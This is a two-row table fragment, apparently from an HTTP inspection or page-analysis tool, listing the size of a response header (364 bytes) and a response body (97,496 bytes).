| Response Header - size: 364 bytes. | |
| Response Body - size: 97,496 bytes. | |